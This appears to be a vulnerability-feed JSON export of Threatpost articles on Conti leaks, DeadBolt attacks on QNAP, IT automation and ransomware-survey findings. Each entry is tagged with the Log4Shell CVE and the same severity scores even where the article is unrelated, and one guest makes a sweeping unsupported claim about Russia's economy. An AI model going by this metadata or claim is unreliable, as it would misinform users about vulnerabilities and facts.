"published": "2021-12-17T17:43:43", "type": "threatpost", "title": "Brand-New Log4Shell Attack Vector Threatens Local Hosts", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T17:43:43", "id": "THREATPOST:49177F7B5015CE94637C97F64C2D4138", "href": "https://threatpost.com/new-log4shell-attack-vector-local-hosts/177128/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T03:51:25", "description": "Information about nuclear plants and air force capabilities. Conti ransomware gang crooks [conjecturing](<https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/>) that the National Security Agency (NSA) was maybe behind the mysterious, months-long [TrickBot](<https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/>) [lull](<https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/>). [Doxxed data](<https://www.theregister.com/2022/03/02/russian_soldier_leaks/>) about 120K Russian soldiers.\n\nThose are just some of the sensitive, valuable data that\u2019s being hacked out of Russia in the [cyber war zone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) \u2013 a war that erupted [even before](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) the country invaded Ukraine.\n\n\u201cEveryone is so focused on Russia hacking the world, but the world has been hacking Russia\u2026. And dumping a lot of critical data on military, nuclear plants, etc.,\u201d said Vinny Troia, cybersecurity Ph.D. 
and founder of [ShadowByte](<https://shadowbyte.com/>), a dark web threat intelligence and cyber fraud investigations firm.\n\nHe\u2019s one of an untold number of experts on dark-web threat intelligence who\u2019ve been poring over the intel that\u2019s been flooding out of practically every nook and cranny of the internet: data that\u2019s being posted on Twitter, Telegram and within the multiple dumps of insider knowledge about the Conti ransomware gang posted by the Ukrainian supporter ContiLeaks.\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nThat ongoing dump, which has included [source code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) for Conti and TrickBot, a decryptor (that doesn\u2019t help recent victims whose files have been encrypted by the Conti gang, unfortunately), and much more, stopped yesterday when the Conti gang shut down its Jabber servers, Troia told Threatpost on Wednesday.\n\nHe visited the Threatpost podcast to update us on the mountain of data about Russia that intelligence experts are now slogging through.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/030222_Vinny_Troia_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>). Also, see below for a lightly edited transcript.\n\n## Lightly Edited Transcript\n\n**Lisa Vaas:** Listeners, welcome to the Threatpost podcast. My guest today is Vinny Troia, cybersecurity PhD and founder of ShadowByte, a dark web threat intelligence and cyber fraud investigations firm. Today, we\u2019re going to focus on all of the data that\u2019s being leaked on Russia as a result of its invasion of Ukraine.\n\n**Lisa Vaas:** Thanks for coming on the podcast. 
Vinny, before we jump in, could you give us a bit of your background, please?\n\n**Vinny Troia:** Sure. Thanks for having me. Yes. So my background I come from a DOD background did a lot of work for surface deployment command. And yeah, I was there for about, I think six or seven years before moving over to private sector.\n\n**Vinny Troia:** And while I was there, I did a lot of work in compliance and random security hacking projects, a lot of red teaming, pen testing. And then eventually I started my own firm. Fast forward to today, our focus now is primarily dealing with a lot of ransomware cases, incident response, and we do a lot of ransom negotiations as well.\n\n**Vinny Troia:** We\u2019re constantly focused on dark web threat actors and any of the players, really.\n\n**Lisa Vaas:** Thank you for that. And well this past week must be just a flurry with the dark web activity around Ukraine and Russia. So in an email, you were talking about how everyone is so focused on Russia hacking the world, but the world has been also hacking Russia and dumping a lot of critical data on military nuclear plants, etc.\n\n**Lisa Vaas:** Where is your Intel coming from? Are there any forums in particular that you\u2019re clued into or is that something you can\u2019t even discuss?\n\n**Vinny Troia:** it\u2019s not even like that. It\u2019s a, I mean, it\u2019s literally everywhere. I mean, there\u2019s Telegram channels. I mean, some is just being pasted right on Twitter.\n\n**Vinny Troia:** I mean, it\u2019s literally coming from all angles at this point.\n\n**Lisa Vaas:** Well, tell me what you\u2019re seeing.\n\n**Vinny Troia:** I\u2019d say last month, there was a lot of data coming out about Ukrainian citizens. I mean, a lot. 
So that was kind of interesting, almost like a precursor to what was happening.\n\n**Vinny Troia:** And now it\u2019s almost like, the rest of the world that\u2019s really pissed and started hacking back and you\u2019re seeing so much data coming out. I\u2019m actually looking for sorry, as we speak, I\u2019m going through some of this data. I mean, there\u2019s stuff on a nuclear plants, some of their air force capabilities.\n\n**Vinny Troia:** There\u2019s another database that I just recently came across that is about a hundred thousand of their military members with photos, passport numbers, things like that. I mean, it\u2019s really just data coming from all depths of. From other infrastructure,\n\n**Lisa Vaas:** well, who, who, who is the primary sources?\n\n**Lisa Vaas:** I mean, I know that anonymous of course has jumped in to, to, to wage war on behalf of Ukraine, cyber war on behalf of Ukraine. And I know that you can put out a call for help from cyber experts on this too. So who, who exactly is, is. Hacking this stuff out of Russia.\n\n**Vinny Troia:** I mean, I, honestly, I couldn\u2019t tell you, I mean, it\u2019s coming, like I said, it\u2019s coming from all sorts of places.\n\n**Vinny Troia:** Right. And when things get leaked, I mean, they just get leaked from various [sources\u2019] usernames on forums or Telegram channels. And so you never really know who it\u2019s coming from. It is interesting that the world kind of banded together against this. And Russia was supposed to have this big cyber arsenal against them.\n\n**Vinny Troia:** And it\u2019s really funny that Joe Biden didn\u2019t mention security once in the state of the union last night, being that it was such a big deal and everybody\u2019s been talking about it.\n\n**Lisa Vaas:** Yeah. 
And, and I remember it was an NBC news last week or, or was reporting on the big cyberattacks, the major offensive cyberattacks that were being discussed at the White House, but then the White House denied [considering offensive cyberattacks].\n\n**Vinny Troia:** The news has been all about cyberattacks and Russia\u2019s capabilities and it\u2019s such a priority, but it just wasn\u2019t even mentioned once. I just, I find that really strange, but regardless, it\u2019s nice that the world kind of banded together to really come after Russia. One of the most, honestly, just incredibly fascinating things is all these leaks that have been occurring regarding the Conti ransomware. Yes. And they\u2019re arguably the largest or at least one of the top few largest ransomware groups in the world. And I mean, they\u2019re just having everything leak: source code, recovery, keys, chat logs.\n\n**Vinny Troia:** I mean, as early, as recently as today with the most recent chat logs that came out, so somebody still has access to their servers and I haven\u2019t even had a chance to read the ones from today.\n\n**Lisa Vaas:** I just wrote up the second dump and I didn\u2019t even know there was more posted today. It\u2019s so hard to keep up. Can we talk a little bit about those dumps? Now as I understand it, it\u2019s the decryptor for version two of the Conti Lock ransomware software [that was leaked]. That\u2019s not even going to be usable to anybody because it was for an older version.\n\n**Lisa Vaas:** How is this going to affect Conti? Another one of my sources was telling me that just one of the gang\u2019s groups got hit by this [leak] and everybody else is pretty much doing fine. They\u2019re carrying on business as usual.\n\n**Vinny Troia:** I think what\u2019s really interesting. And they talked about this in one of the, in some of the logs. 
So Conti uses, or used, this one piece of software called TrickBot in order to disseminate and \u2026 one of the or groupings of the chat log showed that the NSA came after TrickBot specifically.\n\n**Vinny Troia:** I don\u2019t know whether or not they reverse engineered or what they did, but I mean, they were able to shut it down for a couple of weeks just by changing patch numbers and uploading them to a server that would accept the changes. And so what they did was they maxed out the maximum patch number.\n\n**Vinny Troia:** The software couldn\u2019t take any new updates at that point. So they effectively shut it down for a little bit. That was actually really amazing.\n\n**Lisa Vaas:** I totally missed that. Which repository was that in? What\u2019s the name of the repository?\n\n**Vinny Troia:** It\u2019s all JSON files.\n\n**Lisa Vaas:** Everybody knew that TrickBot pretty much shut down for a few months, but I didn\u2019t know that about the NSA piece.\n\n**Vinny Troia:** It\u2019s presumed to be the NSA, given the level of skill that was involved, we\u2019ll call it finesse. I would say it would have to be some government agency.\n\n**Lisa Vaas:** Was there chatter about the shutdown?\n\n**Vinny Troia:** Yeah, it\u2019s basically a handful of officials talking about it and how they were shut down and how they basically had to rebuild their infrastructure.\n\n**Vinny Troia:** They were down for a little bit and eventually they came back, but it just shows that they were being targeted by nation states. 
I think the most interesting thing is, if this really is a Russian-operated group, which is what it seems like, then the fact that all these files are being leaked, whether it\u2019s from an insider or somebody who\u2019s a researcher who\u2019s attacking them specifically, I think this is going to have a major toll on Russia\u2019s finances, especially considering this is a group that is averaging what, a couple hundred million dollars a year recurring revenue?\n\n**Lisa Vaas:** I don\u2019t expect you to know this, but maybe you do: How much of Russia\u2019s economy is actually coming from ransomware or other malware?\n\n**Vinny Troia:** I think the majority, actually. So I think the majority of Russia\u2019s economy is coming from some sort of crime. There\u2019s not a whole lot going on over there. It\u2019s like a big wasteland.\n\n**Lisa Vaas:** Right. The underground members say \u201cprotect the motherland, the motherland protects you.\u201d Except for when they need some stooges to arrest, some low-level stooges to make the U.S. happy, which happened recently.\n\n**Vinny Troia:** As far as the decryptor [goes], you\u2019re correct. It is for an older version. I think I saw some keys floating around as well, but new code is written on top of old code and it\u2019s not like it was replaced completely. So I would imagine that there will be some fallout from that code base.\n\n**Lisa Vaas:** Yeah, there\u2019s a lot of code to go through. I hear. So what were some other really great finds in the intelligence that we\u2019re getting out of Russia during this crisis?\n\n**Vinny Troia:** It\u2019s information on citizens, it\u2019s information on military members. I\u2019ve seen things on nuclear plants. 
I can\u2019t speak to what can be done with all of it, honestly, but the point is it\u2019s there and, in the right hands, I\u2019m sure it could be pretty useful.\n\n**Lisa Vaas:** I assume, during these days, it\u2019s just not going to let up.\n\n**Vinny Troia:** No, and like I said, a couple of hours ago we had more leaks from their Jabber server. So I would imagine whoever has access has been able to pull off a lot, and I think [Conti] actually just shut it down finally.\n\n**Lisa Vaas:** So that means they shut down Jabber. That doesn\u2019t mean that they figured out who the leaker is. Right?\n\n**Vinny Troia:** The person leaking it goes by [ContiLeaks]. But whether or not he\u2019s the one with access, I don\u2019t know. But the point is they figured out that somebody did have access to their Jabber logs. So now they\u2019ve moved servers.\n\n**Lisa Vaas:** Well, awesome. What else can you tell listeners? What can you leave us with?\n\n**Vinny Troia:** I would say that, just because Conti\u2019s out doesn\u2019t mean that the problem is going away anytime soon. So be diligent and keep up with your passwords and make sure that you actually have fresh passwords, because looking at these logs and how they\u2019re getting into a lot of these systems, it\u2019s just using other people\u2019s recycled passwords.\n\n**Vinny Troia:** The hacks they\u2019re using aren\u2019t even that sophisticated. And I mean, even now the majority of hacks are still caused by reused passwords.\n\n**Lisa Vaas:** We can get some intelligence out of the exploits that they\u2019re targeting. I think I saw Zerologon was mentioned as one, and of course we know a lot about their tooling right now. Like the whole Cobalt Strike Beacon thing.\n\n**Vinny Troia:** Cobalt Strike\u2019s been a red teaming tool forever. It\u2019s a staple. For pen testers, it\u2019s an amazing tool. 
And so the fact that they were using it isn\u2019t really a surprise.\n\n**Lisa Vaas:** Well, is there anything surprising that was found in the dumps? I know that we\u2019ve got email addresses of some of the members of the gang.\n\n**Vinny Troia:** You can use that to look for other accounts and potentially start to reverse back to maybe who they are. But I mean, there\u2019s so much information here. I haven\u2019t even gone through maybe a 10th of it. It\u2019s coming up too fast. It\u2019s a full-time job. It takes a full-time team at this point to go through all of this. Because then there was another thing that came out: Rocket.Chat logs from a Rocket.Chat. There\u2019s thousands of logs here.\n\n**Lisa Vaas:** Yeah, that\u2019s pretty bad. When you\u2019ve got a researcher, an intel expert who says he\u2019s getting too much: The firehose is open so wide. So the takeaways for listeners are that these leaks haven\u2019t stopped, and we don\u2019t even know how many that [ContiLeaks] is promising.\n\n**Vinny Troia:** I mean, the fact that today\u2019s leaks caused the shutdown, I presume caused a shut down of their Jabber server. I\u2019m going to say that well has pretty much run dry. I don\u2019t know what else is going to be released in terms of tools, but I\u2019d say all of this has probably put a dent in everything they\u2019re doing for a little bit.\n\n**Lisa Vaas:** We can hope so, but I don\u2019t think we should assume anything. And that\u2019s what you\u2019re telling us: They\u2019re still going to be active and they\u2019re going to retool anyway. Right. And will resurface.\n\n**Vinny Troia:** Yeah. 
I was going to say, giving credit to [security journalist Brian] Krebs on this one, one of the things he reported on was that there was a conversation, and I haven\u2019t even made it to the set about how the ransomware groups were being investigated.\n\n**Vinny Troia:** And someone high up in the group basically told them they didn\u2019t have anything to worry about. The investigation was going to go off of them. And that was right around the time that Russia took down REvil. So it was interesting. It\u2019s almost like they had insider information, or maybe they literally were working for [Russia].\n\n**Lisa Vaas:** I think REvil, that takedown, was the one I was thinking about when I alluded to this kind of token law enforcement action on Russia\u2019s part to maybe make the U.S. shut up. Now I have to go read Brian Krebs. Why didn\u2019t I read Brian Krebs earlier today? I have to do that. That\u2019s like a requirement of the job. OK, well, Vinny, unless you\u2019ve got anything else to add, I\u2019m going to let you go.\n\n**Vinny Troia:** No, all good.\n\n**Lisa Vaas:** I appreciate it. Thank you so much. Thanks for coming on the podcast.\n\n030322 10:49 UPDATE: ContiLeaks, the source of the Conti leaks, is not believed to be the same entity as vx_underground, which has disseminated the leaked files.
\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T16:31:36", "type": "threatpost", "title": "Russia Leaks Data From a Thousand Cuts\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-03T16:31:36", "id": "THREATPOST:6C547AAC30142F12565AB289E211C079", "href": "https://threatpost.com/russia-leaks-data-thousand-cuts-podcast/178749/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-23T17:04:20", "description": "DeadBolt ransomware has resurfaced in a new wave of attacks on QNAP that began in mid-March, signaling renewed targeting of the Taiwan-based vendor\u2019s network-attached storage (NAS) devices by the fledgling threat, researchers said.\n\nResearchers from Censys, which provides attack-surface management solutions, said they observed DeadBolt infections on QNAP gear ramp up slowly starting March 16, with a total of 373 infections that day. 
That number rose to 1,146 devices by March 19, according to [a blog post](<https://censys.io/deadbolt-ransomware-is-back/>) by Censys senior security researcher Mark Ellzey.\n\nThe current attacks harken [back to January](<https://threatpost.com/conti-deadbolt-delta-qnap-ransomware/178083/>), when the company had to push out an unplanned update to its NAS devices, one that not all customers welcomed. The update was meant to clean up after DeadBolt attacks that were greeting customers with the ransomware group\u2019s screen when they logged in, effectively locking them out of the device.\n\nThe new wave of attacks ostensibly follows the same pattern as January\u2019s wave, but the majority of the victims are running QTS on Linux kernel version 5.10.60, Ellzey said. That\u2019s a later version than the update ([QTS 5.0.0.1891](<https://www.qnap.com/en-us/release-notes/qts/5.0.0.1891/20211221>)) pushed out to customers in January.\n\nThat said, \u201cat this time, Censys cannot state whether this is a new attack targeting different versions of the QTS operating system, or if it\u2019s the original exploit targeting unpatched QNAP devices,\u201d he acknowledged.\n\nMoreover, the new infections do not seem to be targeting a specific organization or country; they seem to be evenly split between subscribers of various consumer internet service providers, Ellzey added.\n\n## **D\u00e9j\u00e0 Vu for QNAP Customers**\n\nThe attacks behave the same as the January attacks as far as what the customers experience \u2014 and they ask for the same ransom as previous DeadBolt attacks on QNAP devices, Ellzey said.\n\n\u201cExcept for the [Bitcoin] addresses used to send ransoms to, the attack remains the same: backup files are encrypted, the web administration interface is modified, and victims are greeted with [ransom] messages,\u201d he wrote in the post.\n\nThe attackers are asking for 0.03 Bitcoin for a decryption key, which is about $1,223 at today\u2019s exchange 
rate. They\u2019re also asking for a ransom from QNAP itself: 5 bitcoin or $203,988, for information related to the vulnerabilities; and 50 bitcoin, or about $2 million, for a master key to unlock all affected victims, Ellzey said.\n\nQNAP is not the only company in the crosshairs of DeadBolt, which first came to researchers\u2019 attention due to the January attacks. In mid-February, Reddit users began reporting that the ransomware was targeting [ASUSTOR ADM devices](<https://www.asustor.com/service/release_notes#adm4>), according to Censys.\n\n## **Attack Detection**\n\nCensys researchers picked up on the latest wave of QNAP attacks due to the unique way the current DeadBolt ransomware variant communicates with victims, according to the post.\n\n\u201cInstead of encrypting the entire device, which effectively takes the device offline (and out of the purview of Censys), the ransomware only targets specific backup directories for encryption, and vandalizes the web-administration interface with an informational message explaining how to remove the infection,\u201d Ellzey wrote.\n\nTherefore, using [a simple search query](<https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=100&virtual_hosts=INCLUDE&q=services.http.response.html_title%3A+%22ALL+YOUR+FILES+HAVE+BEEN+LOCKED+BY+DEADBOLT.%22>) on the HTML title the ransom page serves (`services.http.response.html_title: \"ALL YOUR FILES HAVE BEEN LOCKED BY DEADBOLT.\"`), Censys \u201ccould easily find infected devices exposed on the public internet,\u201d according to the post. The same title string is a usable indicator for anyone scanning their own address space for NAS devices whose admin interface has been defaced.\n\nAlong with general information about what hosts were infected with DeadBolt, researchers also obtained and tracked every unique Bitcoin wallet address used as a ransom drop, Ellzey added.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-23T15:43:49", "type": "threatpost", "title": "DeadBolt Ransomware Resurfaces to Hit QNAP Again", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-23T15:43:49", "id": "THREATPOST:57F52943964BADEBC748C4AC796CEEB6", "href": "https://threatpost.com/deadbolt-ransomware-qnap-again/179057/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-08T16:05:10", "description": "The majority of today\u2019s cybersecurity breaches stem from unpatched vulnerabilities and outdated systems, which means that many cyberattacks are preventable. 
Unfortunately, it can be challenging for IT teams to keep up with the pace of new patches every month, especially when employee devices are scattered across a distributed workforce and there\u2019s a shortage of cybersecurity professionals. These emerging factors make efficiency a critical component for any IT team.\n\nTo respond quickly to newly disclosed exploits, more companies are turning to IT-automation tools for patching and system management. By streamlining the processes and reducing the workload, IT teams can quickly address new severe exploits and save time to focus their efforts on more high-impact projects.\n\nHowever, while the trend of automation will continue to grow, there still remain many challenges to its adoption, and new innovations or threats could change how the future looks for this technology.\n\n## What Can We Expect in IT Automation in the Near Future?\n\nFirst and foremost, IT automation will adapt to distributed environments. When we surveyed IT professionals, 80 percent stated that the process of managing endpoints has become harder as a result of more employees working remotely. Having to maintain management servers across multiple, distributed sites, with sporadic, inconsistent connectivity to endpoints, has made it difficult for IT teams to remain efficient and nimble. This has led to more organizations looking for cloud-native solutions to remedy these challenges.\n\nCloud-native technologies make connectivity with remote devices easier while staying secure without the use of VPNs. They also improve visibility into the exact, real-time status of a device. IT teams will have an easier time pushing patches automatically without worrying about VPN bandwidth restrictions. 
Within the next year, anticipate that more businesses will realize these immense benefits and replace existing tools with cloud-native IT automation.\n\nOn the flip side, challenges remain, such as addressing burnout and emerging security concepts.\n\n## IT and Security Teams\u2019 Mental Health Comes to the Fore\n\nOne thing that has become evident in the 2020s is that there is a lack of attention on and investment in employee mental health and safety. This is especially true when it comes to IT and security workers, who have come under enormous pressure and stress in our hybrid world today, where both outages and cyberattacks aren\u2019t just common, but expected to happen at all times.\n\nAutomation is one way to drive more accessibility and ease-of-use for IT teams. While in the past the core argument for automation was that it provides more time for innovation, today the argument must simply be that automation creates more time for teams \u2014 but we\u2019re not there yet.\n\nConsider the (relatively) recent issue with the [Log4j vulnerability](<https://threatpost.com/log4j-vulnerability-pressures-security-world/177721/>). The issue wasn\u2019t \u201cjust\u201d that there was a new vulnerability to respond to and worry about. 
It was that many security and IT professionals had to go through the manual task of updating every endpoint across their system, while managers and even the C-suite watched over their shoulders.\n\nThis isn\u2019t easy \u2013 it\u2019s stressful, and it will make your teams more likely to quit, which is just unacceptable as we continue to navigate a world reshaped by the Great Resignation and IT skills shortage.\n\n## New IT Security Concepts Are on the Horizon\n\nAs Automox predicted at the end of last year, IT and security transformation continues as organizations everywhere try to find a new normal following the disruptions of the pandemic, and IT automation will have to adjust.\n\nThis has been challenging for many organizations \u2014 and more importantly, people, as discussed above \u2014 but there are silver linings too. The pandemic has pushed new innovation across many areas, with exciting new tools and practices on the horizon for IT and security teams.\n\nOne innovation that is particularly interesting is cybersecurity mesh architectures. Gartner has claimed that \u201corganizations adopting a cybersecurity mesh architecture will reduce the financial impact of security incidents by an average of 90 percent\u201d by 2024.\n\nA cybersecurity mesh architecture leverages various parts of the enterprise to integrate widely distributed, disparate security services. This is key to managing and accounting for a workforce that has never been more remote and globally distributed. Designing and implementing an IT security infrastructure that is not focused on a single perimeter, but instead on smaller individual perimeters around each access point, provides quality-of-life improvements as well as more control over an organization\u2019s overall security profile.\n\nAnother trend that may seem overdue but is very much happening in real-time is the transition of ITOps and SecOps tools to cloud infrastructure. 
This includes firewalls, cloud access security brokers (CASBs), web gateways and other tools, as teams wind down legacy on-prem contracts and move to the cloud for more accessibility, speed and scale.\n\nBottom line: IT automation is a transformational trend that is already occurring across the enterprise today, but it needs to accelerate in order to address the many pain points security and IT teams still face.\n\n**_Chris Hass is the Director of Information Security and Research at [Automox](<https://www.automox.com/>)._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-08T15:56:36", "type": "threatpost", "title": "The Uncertain Future of IT Automation", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-08T15:56:36", "id": "THREATPOST:3B8B02F621E9D9883A541B1B26BDF410", "href": "https://threatpost.com/uncertain-future-it-automation/178709/", "cvss": {"score": 9.3, 
"vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-10T14:12:32", "description": "You hate to blame the victim, but the fact of the matter is that businesses are just asking to get whacked with ransomware multiple times.\n\nA recent [study](<https://www.extrahop.com/company/press-releases/2022/cyber-confidence-index-2022/>) of IT leaders from cloud-native network detection and response firm ExtraHop shows that businesses aren\u2019t even aware of the \u201cattack me,\u201d \u201ceasy prey\u201d pheromones they\u2019re giving off: In fact, there\u2019s a yawning chasm between perception and reality.\n\nThe study shows that corporate leaders have a false sense of security when it comes to their organizations\u2019 IT security readiness. Their confidence is disconnected from their admittance that their cybersecurity incidents are a result of their own outdated IT security plans, including widespread use of insecure and deprecated protocols, as well as growing numbers of unmanaged devices.\n\n\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nThe reality: 69 percent of respondents acknowledged transmitting sensitive data over unencrypted HTTP connections instead of more secure HTTPS connections. Another 68 percent are still running SMBv1, the protocol exploited in major/ancient/still-exploited attacks like [WannaCry](<https://threatpost.com/wannacry-gandcrab-top-ransomware-scene/178589/>) and [NotPetya](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>), leading to more than $1 billion in damages worldwide.\n\nDenial ain\u2019t just a river in Egypt. The delusion is particularly dangerous, given the sky-high rate of ransomware attacks. 
In ExtraHop\u2019s Cyber Confidence Index 2022 \u2013 which surveyed 500 security and IT decision makers in the United States, United Kingdom, France and Germany \u2013 85 percent reported having suffered at least one ransomware attack, and 74 percent reported experiencing multiple incidents in the past five years.\n\n * A jarring majority have experienced a ransomware attack, with some being hit twice. What\u2019s more, the data shows that if a business is hit once, it\u2019s more likely to be hit again.\n * A number of IT decision makers haven\u2019t faced an attack \u2013 and so they \u201caren\u2019t concerned.\u201d\n * 77 percent of IT decision makers are very or extremely confident in their company\u2019s ability to prevent or mitigate cybersecurity threats. And yet \u2026\n * 64 percent admit that half or more of their cybersecurity incidents are the result of their own outdated IT security postures.\n * 85 percent reported having suffered at least one ransomware attack in the past five years, and 74 percent have experienced multiple attacks.\n * 48 percent of companies that suffered a ransomware attack said they paid the ransom demanded most or all of the time.\n\nJamie Moles, ExtraHop senior technical manager, dropped by the Threatpost podcast to talk about perceptions vs. reality.\n\nWannaCry, which hit a few years ago, is a prime example, he told us. The advice back then (and now) was that organizations should check their backups to make sure they\u2019re usable. Innumerable articles and blogs interrogated admins, asking, Have you actually restored a backup recently to make sure that your restores work? 
Are they up to date?\n\n\u201cA lot of people, we\u2019re finding, actually, that their backup procedures were good, but maybe the technology wasn\u2019t up to date or they were too reliant on things like [volume shadow copies](<https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service>) on workstations,\u201d Jamie told us. \u201cA restore when data was corrupted, not realizing that ransomware gangs turn off volume shadow copies on workstations.\n\n\u201cSo you can\u2019t restore from that. And a lot of organizations found that maybe their backups weren\u2019t fully up to date and they had to go too far back in time to restore, to get themselves operationally back to date. And this has an obvious impact in terms of operating. Resilience has a cost factor associated with it, and getting yourself back to where you were yesterday.\u201d\n\nSo\u2026not to imply anything, but hey, we just thought we\u2019d ask: Have you checked your backups lately to make sure they work?\n\nIf not, maybe go do that. We\u2019ll wait. This podcast doesn\u2019t have an expiration date.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/030722_ExtraHop_Jamie_Moles_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. 
[Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T14:00:32", "type": "threatpost", "title": "Multi-Ransomwared Victims Have It Coming\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T14:00:32", "id": "THREATPOST:02A472487653A461080415A3F7BB23D2", "href": "https://threatpost.com/blaming-ransomware-victims-podcast/178799/", 